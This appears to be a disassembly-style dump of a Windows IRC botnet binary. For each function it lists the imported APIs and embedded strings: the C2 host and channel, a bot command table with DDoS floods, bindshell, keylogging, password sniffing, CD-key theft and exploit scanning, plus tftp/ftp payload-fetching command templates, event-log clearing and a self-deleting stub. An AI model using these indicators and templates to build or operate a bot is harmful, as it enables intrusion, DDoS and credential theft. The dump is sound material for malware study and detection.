sub_outside():
	KERNEL32.GetTickCount
	KERNEL32.GetComputerNameA
	KERNEL32.GetLocaleInfoA
	KERNEL32.GetVersionExA
	WS2_32.socket
	WS2_32.ntohs
	WS2_32.inet_addr
	WS2_32.connect
	WS2_32.closesocket
	KERNEL32.Sleep
	WSOCK32.recv
	WS2_32.send
	KERNEL32.GetVersion
	KERNEL32.GetCommandLineA
	KERNEL32.GetStartupInfoA
	KERNEL32.GetModuleHandleA

sub_424F93(0126):
	KERNEL32.SetUnhandledExceptionFilter

sub_416F9A(019e):
	"%sKB"
	"failed"

sub_401891(01b0):
	WS2_32.ntohs
	WS2_32.socket
	WS2_32.connect
	WS2_32.closesocket
	KERNEL32.Sleep

sub_418827(03c8):
	NTDLL.RtlGetLastWin32Error
	KERNEL32.FormatMessageA

	"%s	Error: %s <%d>."

sub_414232(06af):
	WS2_32.gethostname
	WS2_32.gethostbyname
	WS2_32.socket
	WSOCK32.setsockopt
	KERNEL32.GetTickCount
	WS2_32.ntohs
	WS2_32.sendto
	WS2_32.closesocket

sub_4208E8(06bc):
	KERNEL32.GetCPInfo

sub_41261F(0776):
	WS2_32.ntohs
	WS2_32.inet_addr
	WS2_32.socket
	WS2_32.WSAGetLastError
	KERNEL32.ExitThread
	WS2_32.bind
	WS2_32.closesocket
	WS2_32.WSAIoctl
	WSOCK32.recv
	WS2_32.inet_ntoa

sub_412B31(078a):
	"FTP	sniff"
	"#Gxxx"
	"NICK	"
	"220 "
	"230 "
	"USER	"
	"PASS	"

sub_401071(09b3):
	KERNEL32.Sleep

sub_41E5D2(0a41):
	KERNEL32.HeapCreate
	KERNEL32.HeapDestroy

sub_413C53(0c04):
	KERNEL32.ExitThread

sub_413DEC(0c04):
	KERNEL32.ExitThread

sub_412ABB(0d1f):
	"IRC	sniff"
	"#Gxxx"
	"OPER	"
	"NICK	"
	"oper	"
	"You are now an IRC Operator"

sub_40C5D3(0d6f):
	WS2_32.inet_ntoa
	KERNEL32.CreateThread
	KERNEL32.Sleep
	KERNEL32.CloseHandle

sub_4256B1(0e35):
	KERNEL32.LoadLibraryA
	KERNEL32.GetProcAddress
	USER32.GetActiveWindow
	USER32.GetLastActivePopup
	USER32.MessageBoxA

	"user32.dll"
	"MessageBoxA"
	"GetActiveWindow"
	"GetLastActivePopup"

sub_401252(1026):
	KERNEL32.GetTickCount
	KERNEL32.SetErrorMode
	KERNEL32.CreateMutexA
	KERNEL32.WaitForSingleObject
	KERNEL32.ExitProcess
	WS2_32.WSAStartup
	KERNEL32.GetSystemDirectoryA
	KERNEL32.GetModuleHandleA
	KERNEL32.GetModuleFileNameA
	KERNEL32.GetFileAttributesA
	KERNEL32.SetFileAttributesA
	NTDLL.RtlGetLastWin32Error
	KERNEL32.Sleep
	KERNEL32.CopyFileA
	KERNEL32.GetCurrentProcessId
	KERNEL32.OpenProcess
	KERNEL32.CreateProcessA
	KERNEL32.CloseHandle
	WS2_32.WSACleanup
	KERNEL32.DeleteFileA
	KERNEL32.CreateThread
	WININET.InternetGetConnectedState

	"h43yh4ckerNT"
	"neta.leetz.info"
	"#Gxxx"
	".Gxxx."
	"neta.leetz.info"
	"#Gxxx"
	".Gxxx."

sub_41A413(1255):
	KERNEL32.SearchPathA
	KERNEL32.CreatePipe
	KERNEL32.GetCurrentProcess
	KERNEL32.DuplicateHandle
	KERNEL32.CreateProcessA
	KERNEL32.CloseHandle
	KERNEL32.CreateThread
	NTDLL.RtlGetLastWin32Error

sub_41913A(136f):
	ADVAPI32.OpenSCManagerA
	ADVAPI32.EnumServicesStatusA
	NTDLL.RtlGetLastWin32Error
	ADVAPI32.CloseServiceHandle

	"The following	Windows	services are regi"...
	"	 Unknown"
	"	 Paused"
	"    Pausing"
	" Continuing"
	"    Running"
	"    Stoping"
	"   Starting"
	"    Stopped"
	"%s: %s (%s)"

sub_40D86F(149c):
	KERNEL32.CreateFileA
	KERNEL32.WriteFile
	KERNEL32.ReadFile
	KERNEL32.CloseHandle
	KERNEL32.CreateEventA
	NTDLL.RtlGetLastWin32Error
	KERNEL32.WaitForSingleObject

	"."
	"\\\\%s\\ipc$"
	"\\\\%s\\pipe\\browser"

sub_411CFB(17e4):
	WS2_32.select
	WS2_32.__WSAFDIsSet
	WSOCK32.recv
	WS2_32.send

sub_41A178(1889):
	KERNEL32.OpenProcess
	KERNEL32.TerminateProcess
	KERNEL32.CloseHandle

sub_423867(18d1):
	KERNEL32.GetModuleFileNameA

	"C:\\m_unpacker\\packed.exe"

sub_401B66(1c15):
	KERNEL32.CreateThread
	KERNEL32.Sleep
	NTDLL.RtlGetLastWin32Error
	WS2_32.getsockname
	WS2_32.inet_ntoa
	KERNEL32.GetModuleFileNameA
	KERNEL32.GetSystemDirectoryA
	DNSAPI.DnsFlushResolverCache
	KERNEL32.GetTickCount
	WS2_32.closesocket
	WS2_32.WSACleanup
	KERNEL32.ExitProcess
	WS2_32.inet_addr
	WS2_32.WSAStartup
	WS2_32.gethostbyname
	WS2_32.socket
	WS2_32.ntohs
	WS2_32.connect
	WSOCK32.recv
	WS2_32.send
	SHELL32.ShellExecuteA
	KERNEL32.MoveFileA
	KERNEL32.CreateProcessA
	KERNEL32.GetTempPathA
	KERNEL32.DeleteFileA
	WS2_32.gethostbyaddr
	KERNEL32.TerminateThread

	" :"
	" "
	"!"
	"PING"
	"PONG	%s\r\n"
	"JOIN	%s %s\r\n"
	"001"
	"005"
	"302"
	"@"
	"433"
	"NICK	%s\r\n"
	"KICK"
	"NOTICE %s :%s\r\n"
	"JOIN	%s %s\r\n"
	"NICK"
	":%s%s"
	"PART"
	"QUIT"
	"353"
	"PART"
	"NOTICE %s :%s\r\n"
	"PRIVMSG"
	"NOTICE"
	"SEND"
	"%s"
	"CHAT"
	"%s"
	"4"
	"hi"
	" :"
	"$%d-"
	"$%d"
	"$me"
	"$user"
	"$chan"
	"$rndnick"
	"$server"
	"$chr("
	")"
	"63"
	" "
	"rndnick"
	"rn"
	"die"
	"d"
	"logout"
	"lo"
	"version"
	"ver"
	"dedication"
	"ded"
	"speedtest"
	"st"
	"secure"
	"sec"
	"unsecure"
	"unsec"
	"bindshell"
	"bd"
	"Server"
	"socks4"
	"s4"
	"socks4stop"
	"Server"
	"rloginstop"
	"Server"
	"httpstop"
	"Server"
	"logstop"
	"redirectstop"
	"synstop"
	"skysynstop"
	"targa3stop"
	"wonkstop"
	"packetstop"
	"tsunamistop"
	"wisdomstop"
	"udpstop"
	"pingstop"
	"tftpstop"
	"Server"
	"findfilestop"
	"ffstop"
	"procsstop"
	"psstop"
	"clonestop"
	"Clone"
	"securestop"
	"Secure"
	"scanstop"
	"Scan"
	"scanstats"
	"stats"
	"trstats"
	"connectbackstats"
	"cbstats"
	"exploitlist"
	"explist"
	"reconnect"
	"r"
	"disconnect"
	"dc"
	"quit"
	"q"
	"status"
	"s"
	"id"
	"i"
	"reboot"
	"threads"
	"t"
	"aliases"
	"al"
	"log909"
	"lg909"
	"clearlog"
	"clg"
	"netinfo"
	"ni"
	"sysinfo"
	"si"
	"remove51"
	"rm51"
	"procs"
	"ps"
	"getcdkeys"
	"key"
	"uptime"
	"up"
	"driveinfo"
	"drv"
	"testdlls"
	"dll"
	"opencmd"
	"ocmd"
	"cmdstop"
	""
	"%d. %s"
	"spoof"
	"off"
	"getclip"
	"gc"
	"flusharp"
	"farp"
	"flushdns"
	"fdns"
	"currentip"
	"cip"
	"rloginserver"
	"rlogin"
	"httpserver"
	"http"
	"tftpserver"
	"tftp"
	"crash"
	"crash"
	"scanall"
	"sa"
	"phonehome"
	"NOTICE %s :PHONING HOME: hi ;).\r\n"
	"findpass"
	"fp"
	"#Gxxx"
	"Random"
	"Sequential"
	"full"
	"%s"
	"h43yh4ckerNT"
	"QUIT	:%s\r\n"
	"QUIT :later\r\n"
	"QUIT :disconnecting\r\n"
	"QUIT :reconnecting\r\n"
	"secure"
	"sec"
	"Unsecuring"
	"h1d3b0t Version h4cker"
	"get"
	"%d.%d.%d.*"
	"exploit"
	"#Gxxx"
	"reconnect.in"
	"rin"
	"reconnect.in.ms"
	"rinms"
	"flood"
	"load"
	" "
	" "
	"nt"
	" "
	"notice %s	:%s"
	"mode"
	" "
	"mode	%s %s"
	"join"
	"join	%s"
	"part"
	"part	%s"
	"partflood"
	"CYBER"
	"part	%s %s"
	"pnick"
	"join	%s"
	"CYBER"
	"part	%s %s"
	"join	%s"
	"CYBER"
	"part	%s %s"
	"join	%s"
	"CYBER"
	"part	%s %s"
	"nick"
	"join	%s"
	"chgnick"
	"msg"
	"join	%s"
	"CYBER"
	"CYBER"
	"CYBER"
	"notice"
	"join	%s"
	"CYBER"
	"NOTICE %s	:%s"
	"CYBER"
	"NOTICE %s	:%s"
	"CYBER"
	"NOTICE %s	:%s"
	"ctcp"
	"join	%s"
	"mix"
	"join	%s"
	"CYBER"
	"NOTICE %s	:%s"
	"CYBER"
	"PRIVMSG %s :%s"
	"CYBER"
	"NOTICE %s	:%s"
	"register"
	"nickserv register %s %s"
	"off"
	"nick"
	"n"
	"join"
	"j"
	"part"
	"pt"
	"raw"
	"r"
	"killthread"
	"k"
	"c_quit"
	"c_q"
	"c_rndnick"
	"c_rn"
	"prefix"
	"pr"
	"open"
	"o"
	"server"
	"se"
	"dns"
	"dn"
	"killproc"
	"kp"
	"kill"
	"ki"
	"delete"
	"del"
	"get"
	"gt"
	"list"
	"li"
	"visit"
	"v"
	"mirccmd"
	"mirc"
	"cmd"
	"cm"
	"readfile"
	"rf"
	"psniff"
	"on"
	"#Gxxx"
	"off"
	"sniffer"
	"on"
	"#Gxxx"
	"off"
	"keylog"
	"on"
	"file"
	"off"
	"#Gxxx"
	"net"
	"start"
	"%s"
	"stop"
	"pause"
	"continue"
	"delete"
	"share"
	"%s"
	"user"
	"%s"
	"send"
	"%s"
	"capture"
	"cap"
	"gethost"
	"gh"
	"killlog"
	"kl"
	"addalias"
	"aa"
	"privmsg"
	"action"
	"a"
	"cycle"
	"cy"
	"mode"
	"m"
	"c_raw"
	"c_r"
	"c_mode"
	"c_m"
	"c_nick"
	"c_n"
	"c_join"
	"c_j"
	"c_part"
	"c_p"
	"targa3"
	"t3"
	"tsunami"
	"tsn"
	"repeat"
	"rp"
	"delay"
	"de"
	"update909"
	"up909"
	"execute"
	"e"
	"findfile"
	"ff"
	"rename"
	"mv"
	"icmpflood"
	"icmp"
	"clone"
	"c"
	"ddos.syn"
	"ddos.ack"
	"ddos.random"
	"wisdom.udp"
	"synflood"
	"syn"
	"skysyn"
	"phatwonk"
	"wonk"
	"download909"
	"d1909"
	"redirect"
	"rd"
	"scan"
	"sc"
	"c_privmsg"
	"c_pm"
	"c_action"
	"c_a"
	"portscan"
	"psc"
	"advscan"
	"asc"
	"udpflood"
	"udp"
	"u"
	"netsend"
	"ns"
	"pingflood"
	"ping"
	"p"
	"tcpflood"
	"tcp"
	"email"
	" "
	"helo $rndnick\nmail from: <%s>\nrcpt to: "...
	"httpcon"
	"hcon"
	"syn"
	"ack"
	"random"
	"Spoofed"
	"Normal"
	"ICMP.dll not available"
	"upload"
	"%s\\%i%i%i.dll"
	"ab"
	"open %s\r\n%s\r\n%s\r\n%s\r\nput %s\r\nbye\r\n"
	"-s:%s"
	"ftp.exe"
	"open"
	"#Gxxx"
	"Random"
	"Sequential"
	"[%s]	* %s %s"
	"[%s]	<%s> %s"
	"h43yh4ckerNT"
	"%s%s.exe"
	"repeat"
	"MODE	%s\r\n"
	"JOIN	%s %s\r\n"
	"screen"
	"drivers"
	"frame"
	"video"
	"r"
	"\n"
	"%s"
	"open"
	"QUIT :later\r\n"
	"all"
	"JOIN	%s %s\r\n"
	"NICK	%s\r\n"
	"QUIT :reconnecting\r\n"
	"QUIT :reconnecting\r\n"
	"NICK	%s\r\n"
	"!"
	"~"
	"h4cker"
	"NOTICE %s :Pass auth failed (%s!%s).\r\n"
	"NOTICE %s :Your attempt has been logged"...
	"NOTICE %s :Host Auth failed (%s!%s).\r\n"
	"NOTICE %s :Your attempt has been logged"...
	"h4cker"
	"USERHOST %s\r\n"
	"+i"
	"MODE %s %s\r\n"
	"JOIN	%s %s\r\n"

sub_415DE9(1c79):
	USER32.IsWindow
	USER32.SendMessageA
	USER32.DestroyWindow

	"Window"

sub_401000(1cb0):
	ADVAPI32.RegCreateKeyExA
	ADVAPI32.RegSetValueExA
	ADVAPI32.RegDeleteValueA
	ADVAPI32.RegCloseKey

	"Windows Network Service"

sub_419E77(1dac):
	KERNEL32.CreateToolhelp32Snapshot
	KERNEL32.Process32First
	KERNEL32.Process32Next
	KERNEL32.lstrcmpiA
	KERNEL32.OpenProcess
	KERNEL32.TerminateProcess
	KERNEL32.CloseHandle
	KERNEL32.Module32First

	"SeDebugPrivilege"
	" %s (%d)"
	"SeDebugPrivilege"

sub_41A94E(1e6a):
	ADVAPI32.RegOpenKeyExA
	ADVAPI32.RegSetValueExA
	ADVAPI32.RegCloseKey
	KERNEL32.GetLogicalDrives
	KERNEL32.GetDriveTypeA

	"Software\\Microsoft\\OLE"
	"EnableDCOM"
	"SYSTEM\\CurrentControlSet\\Control\\Lsa"
	"restrictanonymous"
	"%c$"
	"%c:\\"

sub_40E453(1e85):
	KERNEL32.CreateFileA
	KERNEL32.TransactNamedPipe
	KERNEL32.WriteFile
	KERNEL32.CloseHandle
	KERNEL32.Sleep

	"\\\\%s\\ipc$"
	"[-] Failed to	connect	to host	!\n"
	"\\\\%s\\pipe\\browser"
	"[+] Binding to RPC interface ... \n"

sub_40B0C8(1fc3):
	KERNEL32.TerminateThread
	WS2_32.closesocket

sub_41A2BE(21b8):
	KERNEL32.PeekNamedPipe
	KERNEL32.GetExitCodeProcess
	KERNEL32.Sleep
	KERNEL32.ReadFile
	KERNEL32.ExitThread

sub_40BFAA(21ca):
	KERNEL32.GetTickCount
	WS2_32.inet_ntoa
	NTDLL.RtlEnterCriticalSection
	NTDLL.RtlLeaveCriticalSection
	KERNEL32.Sleep
	KERNEL32.ExitThread

	"sym"

sub_42501C(2211):
	KERNEL32.GetTimeZoneInformation
	KERNEL32.WideCharToMultiByte

	"TZ"

sub_40BE71(22a3):
	"%d.%d.%d.%d"

sub_422E08(22de):
	NTDLL.RtlSizeHeap

sub_417973(234c):
	KERNEL32.OpenProcess
	KERNEL32.GetSystemInfo
	KERNEL32.VirtualQueryEx
	KERNEL32.GetProcessHeap
	NTDLL.RtlAllocateHeap
	KERNEL32.ReadProcessMemory
	NTDLL.RtlFreeHeap
	KERNEL32.CloseHandle

sub_418466(24da):
	WS2_32.inet_addr
	WS2_32.socket
	WS2_32.ntohs
	WS2_32.connect
	WS2_32.send
	WSOCK32.recv
	WS2_32.closesocket

sub_41ACA2(28ac):
	WS2_32.ntohs
	WS2_32.socket
	WS2_32.connect
	KERNEL32.GetTickCount
	WS2_32.send
	WS2_32.closesocket

	"POST / HTTP/1.0\r\nHost: %s\r\nContent-Leng"...
	"\r\n"

sub_40B8CE(28ed):
	WS2_32.inet_ntoa

sub_417AA0(2950):
	KERNEL32.GetProcessHeap
	NTDLL.RtlAllocateHeap
	NTDLL.RtlRunDecodeUnicodeString
	NTDLL.RtlFreeHeap

sub_41A09A(2a9a):
	KERNEL32.ExitThread

sub_419D4E(2b0f):
	KERNEL32.GetComputerNameA

sub_419AA4(2bcd):
	"Username accounts for	local system:"
	"  %S"
	"Total	users found: %d."

sub_40ED23(2cd6):
	WSOCK32.recv
	KERNEL32.WriteFile

sub_40AA3C(2cf7):
	IPHLPAPI.GetIpNetTable
	IPHLPAPI.DeleteIpNetEntry

sub_4235D2(2f2e):
	KERNEL32.UnhandledExceptionFilter

sub_40AA04(2fa5):
	WS2_32.inet_addr
	WS2_32.gethostbyname

sub_40B71C(30be):
	WS2_32.inet_addr
	KERNEL32.ExitThread

	"sym"

sub_40E31A(3595):
	WS2_32.inet_addr
	WS2_32.ntohs
	WS2_32.socket
	WS2_32.connect
	WSOCK32.recv
	WS2_32.send
	KERNEL32.Sleep
	WS2_32.closesocket

	"tftp -i %s get %s\r\n"

sub_4274B3(37c4):
	KERNEL32.GetStringTypeW
	KERNEL32.GetStringTypeA
	KERNEL32.WideCharToMultiByte

sub_40E8C5(3ac0):
	WS2_32.send

sub_40BE29(3b1d):
	WS2_32.ntohl

sub_41105E(3baf):
	WSOCK32.recv

sub_418A34(3cc3):
	KERNEL32.GetTempPathA
	KERNEL32.CreateFileA
	KERNEL32.WriteFile
	KERNEL32.CloseHandle
	KERNEL32.GetModuleHandleA
	KERNEL32.GetModuleFileNameA
	KERNEL32.GetFileAttributesA
	KERNEL32.SetFileAttributesA
	KERNEL32.ExpandEnvironmentStringsA
	KERNEL32.CreateProcessA

	"%sdel.bat"
	"@echo	off\r\n:repeat\r\ndel \"%%1\"\r\nif exist"...
	"%%comspec%% /c %s	%s"

sub_418BBC(3f0f):
	KERNEL32.GetVersionExA
	ADVAPI32.OpenEventLogA
	ADVAPI32.ClearEventLogA
	NTDLL.RtlGetLastWin32Error

sub_41896E(3f4b):
	KERNEL32.SearchPathA
	KERNEL32.CreateFileA
	KERNEL32.GetFileTime
	KERNEL32.CloseHandle
	KERNEL32.SetFileTime

	"explorer.exe"

sub_410DBC(3fdf):
	WSOCK32.recv
	WS2_32.send
	WS2_32.closesocket
	KERNEL32.ExitThread

sub_40F83F(4036):
	WS2_32.WSAStartup
	WS2_32.socket
	WS2_32.inet_addr
	WS2_32.ntohs
	WS2_32.connect
	WS2_32.closesocket
	WS2_32.WSACleanup

sub_40D781(4089):
	KERNEL32.WriteFile

sub_41AE7F(4107):
	"www.schlund.net"
	"www.utwente.nl"
	"verio.fr"
	"www.1und1.de"
	"www.switch.ch"
	"www.belwue.de"
	"de.yahoo.com"
	"www.google.it"
	"www.xo.net"
	"www.stanford.edu"
	"www.verio.com"
	"www.nocster.com"
	"www.rit.edu"
	"www.cogentco.com"
	"www.burst.net"
	"nitro.ucsc.edu"
	"www.level3.com"
	"www.above.net"
	"www.easynews.com"
	"www.google.com"
	"www.lib.nthu.edu.tw"
	"www.st.lib.keio.ac.jp"
	"www.d1asia.com"
	"www.nifty.com"
	"yahoo.co.jp"
	"www.google.co.jp"

sub_4114AA(4448):
	KERNEL32.CreatePipe
	NTDLL.RtlGetLastWin32Error
	KERNEL32.CloseHandle

sub_41E48A(45c9):
	KERNEL32.GetVersionExA
	KERNEL32.GetEnvironmentVariableA
	KERNEL32.GetModuleFileNameA

	"__MSVCRT_HEAP_SELECT"
	"__GLOBAL_HEAP_SELECTED"

sub_4220B2(4634):
	KERNEL32.GetModuleHandleA
	KERNEL32.GetProcAddress

	"KERNEL32"
	"IsProcessorFeaturePresent"

sub_42410C(4712):
	KERNEL32.SetStdHandle

sub_41B1FC(4977):
	KERNEL32.GetVersionExA
	ADVAPI32.GetUserNameA
	WS2_32.inet_addr
	WS2_32.gethostbyaddr
	KERNEL32.GetSystemDirectoryA
	KERNEL32.GetDateFormatA
	KERNEL32.GetTimeFormatA
	KERNEL32.GlobalMemoryStatus

	"95"
	"NT"
	"98"
	"ME"
	"2K"
	"XP"
	"2003"
	"???"
	"%s (%s)"
	"couldn't resolve host"
	"HH:mm:ss"

sub_40B656(4c22):
	" Scan Time: %s."

sub_40E71F(4e3f):
	WS2_32.inet_addr
	WS2_32.ntohs
	WS2_32.socket
	WS2_32.connect
	WS2_32.recv
	WS2_32.send
	WS2_32.closesocket

	"cmd /k echo open %s %d >> ii &echo user"...

sub_4221D9(502f):
	"e+000"

sub_414A9E(52c6):
	KERNEL32.GetTickCount
	WS2_32.socket
	WS2_32.getsockname
	WS2_32.inet_addr
	WS2_32.ntohs
	WS2_32.sendto
	WS2_32.closesocket

	"%d.%d.%d.%d"

sub_424095(545a):
	KERNEL32.SetStdHandle

sub_423383(547a):
	KERNEL32.LCMapStringW
	KERNEL32.LCMapStringA
	KERNEL32.MultiByteToWideChar
	KERNEL32.WideCharToMultiByte

sub_410E59(550e):
	WS2_32.select
	WS2_32.closesocket
	KERNEL32.ExitThread
	WSOCK32.recv
	WS2_32.getpeername
	WS2_32.WSAGetLastError
	WS2_32.gethostbyaddr
	WS2_32.inet_ntoa
	WS2_32.send
	NTDLL.RtlGetLastWin32Error

	"Permission denied\n"

sub_418D6C(5627):
	KERNEL32.GetVersionExA
	KERNEL32.LoadLibraryA
	KERNEL32.GetProcAddress
	KERNEL32.GetProcessHeap
	KERNEL32.FreeLibrary

	"netapi32.dll"
	"NetMessageBufferSend"

sub_41E45D(5645):
	KERNEL32.GetModuleHandleA

sub_41B146(5868):
	KERNEL32.Sleep

sub_41F46E(58ed):
	KERNEL32.VirtualAlloc

sub_413081(5910):
	KERNEL32.GetTickCount
	KERNEL32.ExitThread

sub_41720A(594b):
	KERNEL32.ExitThread

sub_416F52(5b85):
	KERNEL32.GetDiskFreeSpaceExA

sub_40D082(5f99):
	WS2_32.send

	"GET /	HTTP/1.0\r\nHost: %s\r\nAuthorization"...

sub_41B9D2(6050):
	NTDLL.RtlAllocateHeap
	NTDLL.RtlReAllocateHeap

sub_422FE4(6091):
	KERNEL32.SetFilePointer
	NTDLL.RtlGetLastWin32Error

sub_425EF2(6338):
	"1#SNAN"
	"1#IND"
	"1#INF"
	"1#QNAN"

sub_418FBC(6353):
	"The specified	service	name is	invalid."
	"The requested	control	code is	undefined"...
	"The handle is	invalid."
	"The handle does not have the required	a"...
	"The service binary file could	not be fo"...
	"The service cannot be	stopped	because	o"...
	"The database is locked."
	"A thread could not be	created	for the	s"...
	"The process for the service was started"...
	"The requested	control	code is	not valid"...
	"An instance of the service is	already	r"...
	"The system is	shutting down."
	"An unknown error occurred: <%ld>"

sub_41ED85(64eb):
	KERNEL32.VirtualAlloc

sub_41AC6A(655e):
	KERNEL32.Sleep

sub_40F23F(66d7):
	WS2_32.WSAStartup
	WS2_32.socket
	WS2_32.setsockopt
	WS2_32.ioctlsocket
	WS2_32.ntohs
	WS2_32.bind
	WS2_32.listen
	WS2_32.select
	WS2_32.__WSAFDIsSet
	WS2_32.accept
	WS2_32.send
	WS2_32.recv
	WS2_32.closesocket

	"220 StnyFtpd 0wns j0\n"
	"%s %s"
	"USER"
	"331 Password required\n"
	"PASS"
	"230 User logged in.\n"
	"SYST"
	"215 StnyFtpd\n"
	"REST"
	"350 Restarting.\n"
	"257 \"/\" is current directory.\n"
	"TYPE"
	"A"
	"200 Type set to A.\n"
	"TYPE"
	"I"
	"200 Type set to I.\n"
	"PASV"
	"425 Passive not supported on this serve"...
	"LIST"
	"226 Transfer complete\n"
	"PORT"
	"%*s %[^,],%[^,],%[^,],%[^,],%[^,],%[^\n]"...
	"%x%x\n"
	"%s.%s.%s.%s"
	"200 PORT command successful.\n"
	"RETR"
	"150 Opening BINARY mode data connection"...
	"226 Transfer complete.\n"
	"[FTP]: I just	owned: %s"
	"425 Can't open data connection.\n"
	"QUIT"
	"221 Goodbye happy r00ting.\n"

sub_424686(66df):
	KERNEL32.WideCharToMultiByte

sub_417646(6944):
	KERNEL32.GetProcessHeap
	NTDLL.RtlAllocateHeap
	NTDLL.ZwQuerySystemInformation
	NTDLL.RtlFreeHeap
	NTDLL.RtlCreateQueryDebugBuffer
	NTDLL.RtlQueryProcessDebugInformation
	NTDLL.RtlDestroyQueryDebugBuffer

	"WINLOGON"
	"NWGINA"
	"MSGINA"

sub_4150A6(69d4):
	WS2_32.inet_addr
	KERNEL32.ExitThread

sub_416028(69df):
	ADVAPI32.RegOpenKeyExA
	ADVAPI32.RegQueryValueExA
	ADVAPI32.RegCloseKey

	"r"
	"="
	"="

sub_40E80D(6bfa):
	WS2_32.inet_addr
	WS2_32.ntohs
	WS2_32.socket
	WS2_32.connect
	WS2_32.send
	WS2_32.closesocket

sub_41B881(6c37):
	NTDLL.RtlFreeHeap

sub_41171A(6d7f):
	KERNEL32.GenerateConsoleCtrlEvent
	WS2_32.send
	KERNEL32.WriteFile
	WSOCK32.recv

sub_4115A3(6ddc):
	KERNEL32.GetCurrentProcess
	KERNEL32.DuplicateHandle
	KERNEL32.CreateProcessA
	KERNEL32.CloseHandle
	NTDLL.RtlGetLastWin32Error

	"cmd /q"

sub_414CD8(6f5f):
	KERNEL32.ExitThread

sub_415240(70a7):
	WS2_32.WSASocketA
	WSOCK32.setsockopt
	KERNEL32.GetTickCount
	WS2_32.ntohs
	WS2_32.socket
	WS2_32.closesocket
	WS2_32.inet_addr
	WS2_32.ntohl
	WS2_32.sendto
	KERNEL32.Sleep

	" "
	"%s%d	"

sub_41802F(7166):
	"-|`_\\{[]}"
	"-|`_\\{[]}"
	"-|`_\\{[]}"
	"-|`_\\{[]}"

sub_411A37(729a):
	WS2_32.select
	WS2_32.closesocket
	KERNEL32.ExitThread
	WSOCK32.recv
	WS2_32.send
	WS2_32.socket
	WS2_32.WSAGetLastError
	WS2_32.connect

sub_41BCE3(7566):
	NTDLL.RtlAllocateHeap

sub_40B945(7709):
	KERNEL32.GetModuleFileNameA
	KERNEL32.CreateThread
	NTDLL.RtlGetLastWin32Error
	KERNEL32.Sleep

sub_415157(772a):
	WS2_32.connect
	WS2_32.ioctlsocket
	WS2_32.select
	WS2_32.__WSAFDIsSet
	WS2_32.getsockopt

sub_41A1CF(7918):
	KERNEL32.CloseHandle

sub_4129A4(79f8):
	"Bot	sniff"
	"#Gxxx"
	"[PSNIFF]:"
	"PSNIFF//"
	"JOIN	#"
	"302 "
	"366 "
	":.login"
	":!login"
	":!Login"
	":.Login"
	":.ident"
	":!ident"
	":.hashin"
	":!hashin"

sub_413CEF(79fd):
	WS2_32.ntohs
	WS2_32.socket
	WS2_32.ioctlsocket
	WS2_32.connect
	KERNEL32.Sleep
	WS2_32.closesocket

sub_40F956(7af1):
	WS2_32.ntohs
	WS2_32.socket
	WS2_32.bind
	WS2_32.listen
	WS2_32.ioctlsocket
	WS2_32.select
	WS2_32.__WSAFDIsSet
	WS2_32.accept
	WSOCK32.recv
	WS2_32.closesocket
	WS2_32.WSAGetLastError
	KERNEL32.ExitThread

	"GET "
	" "
	"\r\n"

sub_41B576(7d50):
	WININET.InternetCrackUrlA
	WININET.InternetConnectA
	WININET.HttpOpenRequestA
	WININET.HttpSendRequestA
	WININET.InternetCloseHandle
	KERNEL32.ExitThread

sub_40AC87(7e76):
	KERNEL32.GetTickCount

sub_426733(8107):
	KERNEL32.CompareStringW
	KERNEL32.CompareStringA
	KERNEL32.GetCPInfo
	KERNEL32.MultiByteToWideChar

sub_424517(81be):
	KERNEL32.GetStringTypeW
	KERNEL32.GetStringTypeA
	KERNEL32.MultiByteToWideChar

sub_426CA0(822d):
	"string too long"

sub_426ECC(822d):
	"invalid string position"

sub_41444D(8291):
	KERNEL32.GetTickCount
	WS2_32.socket
	WS2_32.WSAGetLastError
	KERNEL32.ExitThread
	WSOCK32.setsockopt
	WS2_32.inet_addr
	WS2_32.ntohs
	WS2_32.ntohl
	WS2_32.sendto
	WS2_32.closesocket

	"syn"
	"ack"
	"random"

sub_417C50(8474):
	WS2_32.socket
	WS2_32.ntohs
	WS2_32.inet_addr
	WS2_32.gethostbyname
	WS2_32.connect
	WS2_32.closesocket

sub_41E272(84ec):
	KERNEL32.CloseHandle
	NTDLL.RtlGetLastWin32Error

sub_41E62F(8555):
	NTDLL.RtlAllocateHeap

sub_40B215(8732):
	"%s %s	stopped. (%d thread(s) stopped.)"
	"%s No	%s thread found."

sub_40BF0D(8768):
	WS2_32.socket
	WS2_32.ntohs
	WS2_32.ioctlsocket
	WS2_32.connect
	WS2_32.select
	WS2_32.closesocket

sub_41E6A2(87ad):
	KERNEL32.VirtualFree
	NTDLL.RtlFreeHeap

sub_41A5C8(8931):
	KERNEL32.ExitThread

sub_4196D6(893c):
	"Account: %S"
	"Full Name:	%S"
	"User Comment: %S"
	"Comment: %S"
	"Unknown"
	"Administrator"
	"User"
	"Guest"
	"Privilege Level: %s"
	"Auth Flags: %d"
	"Home Directory: %S"
	"Parameters: %S"
	"Password Age: %d"
	"Bad Password Count: %d"
	"Number of Logins: %d"
	"Last Logon: %d"
	"Last Logoff: %d"
	"Logon Server: %S"
	"Country	Code: %d"
	"User's Language: %d"
	"Max. Storage: %d"

sub_41D344(8af0):
	NTDLL.RtlUnwind

sub_424FD8(8bd2):
	KERNEL32.IsBadCodePtr

sub_419339(8cdb):
	KERNEL32.WideCharToMultiByte

sub_415886(8d42):
	KERNEL32.ExitThread

sub_42425E(8dd2):
	KERNEL32.CreateFileA
	KERNEL32.GetFileType
	KERNEL32.CloseHandle
	NTDLL.RtlGetLastWin32Error

sub_4188B1(8e50):
	USER32.OpenClipboard
	USER32.GetClipboardData
	KERNEL32.GlobalLock
	KERNEL32.GlobalUnlock
	USER32.CloseClipboard

sub_413E88(9056):
	WS2_32.WSAStartup
	WS2_32.WSASocketA
	WSOCK32.setsockopt
	WS2_32.ntohs
	KERNEL32.QueryPerformanceFrequency
	KERNEL32.QueryPerformanceCounter
	WS2_32.ntohl
	WS2_32.sendto
	WS2_32.closesocket
	WS2_32.WSACleanup
	WS2_32.WSAGetLastError

sub_41DBBE(91cb):
	KERNEL32.GetFileAttributesA
	NTDLL.RtlGetLastWin32Error

sub_41946F(935d):
	ADVAPI32.IsValidSecurityDescriptor

	"Share	name:	 Resource:		 "...
	"Yes"
	"No"
	"%-14S %-24S %-6u %-4s"

sub_4231D6(94b9):
	KERNEL32.WriteFile
	NTDLL.RtlGetLastWin32Error

sub_40C94C(94d6):
	"�B�B�B�B"
	"CCCC"

sub_4138B0(953e):
	IPHLPAPI.IcmpCreateFile
	WS2_32.inet_addr
	WS2_32.gethostbyname
	KERNEL32.ExitThread
	IPHLPAPI.IcmpSendEcho
	IPHLPAPI.IcmpCloseHandle

sub_41E034(95ea):
	KERNEL32.MultiByteToWideChar
